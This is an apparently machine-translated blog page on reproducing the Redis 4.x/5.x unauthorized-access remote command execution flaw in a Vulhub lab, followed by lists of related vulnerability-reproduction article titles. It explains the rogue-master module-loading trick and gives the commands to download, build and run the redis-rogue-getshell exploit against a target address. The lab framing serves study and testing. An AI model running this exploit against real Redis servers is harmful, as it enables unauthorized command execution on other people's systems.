[redis-rce] Redis 4.x/5.x Unauthorized Access - Remote Command Execution Vulnerability - Code World

[redis-rce] Redis 4.x/5.x Unauthorized Access - Remote Command Execution Vulnerability

Language 2023-07-18 18:35:25 views: null

Vulnerability reference:
https://vulhub.org/#/environments/redis/4-unacc/
https://github.com/vulhub/redis-rogue-getshell
Vulnerability principle:
Redis unauthorized access in 4.x/5.0. 5, we can use the master/slave mode to load remote modules and execute arbitrary commands through dynamic link libraries.
Download the exp code, compile it locally to generate the exp.so library file, and then configure the master-slave synchronization function through redis without authorization to modify the address of the master server to the address where exp.so is stored, and use the synchronization function to synchronize the exp.so link library to On the compromised host, call the system function to execute the command through exp.so.
Vulnerability reproduction:

docker-compose up -d

wget https://github.com/vulhub/redis-rogue-getshell/archive/master.zip
unzip master.zip
cd redis-rogue-getshell-master/
 cd RedisModulesSDK/
 make

python3 redis-master.py -r 10.12.140.222 -p 6379 -L 172.16.75.135 -P 8881 -f RedisModulesSDK/exp.so -c "ifconfig"

insert image description here

Guess you like

Origin blog.csdn.net/u013908944/article/details/111240323

[redis-rce] Redis 4.x/5.x Unauthorized Access - Remote Command Execution Vulnerability

Redis 4.x/5.x unauthorized access vulnerability

Unauthorized access to rce before Redis 4.x/5.0.5

Redis unauthorized access vulnerability recurrence

ThinkPHP 5.x remote command execution vulnerability reproduction

ThinkPHP 5.x remote command execution vulnerability analysis and reproducibility

redis Unauthorized Access Vulnerability reproduction study

Redis unauthorized access to and use of the vulnerability protection

Redis unauthorized vulnerability summary

[High risk] Apache Cassandra has an unauthorized vulnerability that leads to remote command execution

Redis Unauthorized Access Vulnerability Replay and rehabilitation program (unfinished)

Web Security: Redis Unauthorized Access Vulnerability Test.

Apache Flink unauthorized access + remote code execution

Command Execution Vulnerability - Remote Command Execution

Redis unauthorized access reproduction

pikachu learn --RCE (remote command code execution vulnerability)

pikachu--RCE (Remote Command / Code Execution Vulnerability)

Pikachu-RCE [remote code execution vulnerability command]

RCE vulnerability reproduction and utilization of jumpserver remote command execution

XXL-JOB statement on remote command execution vulnerabilities caused by unauthorized access

Redis unauthorized vulnerability detection tool

Unauthorized redis vulnerability reproduction and utilization

Redis unauthorized vulnerability construction and reproduction

RCE remote command execution

[xxl-job] RCE unauthorized remote command execution analysis + POC test

Weblogic management console unauthorized remote command execution vulnerability recurrence (cve-2020-14882/cve-2020-14883)

Redis unauthorized access to the attack process

Redis unauthorized access to bounce shell

Redis unauthorized access to bounce shell

wen Security Vulnerability No. 4 - Unauthorized Access

Recommended

微软回应中国区AI团队“打包赴美”传闻

Ranking

How to use ChatGPT to write 100,000+ hot articles for public accounts (includes prompt words)

sudo echo command execution Permission denied

ADO: Using Transactions to Operate Oracle Database

[Java] [Class and Object] equals, hashCode, clone methods

Linux virtual host function

Порт управления rabbitmq открыт

on,where

jQuery WeUI

How can there be a weed pilot in Hangzhou?

tcp / ip model four

Daily

More

2024-05-15(5)

2024-05-14(9)

2024-05-13(8)

2024-05-12(28)

2024-05-11(32)

2024-05-10(34)

2024-05-09(32)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)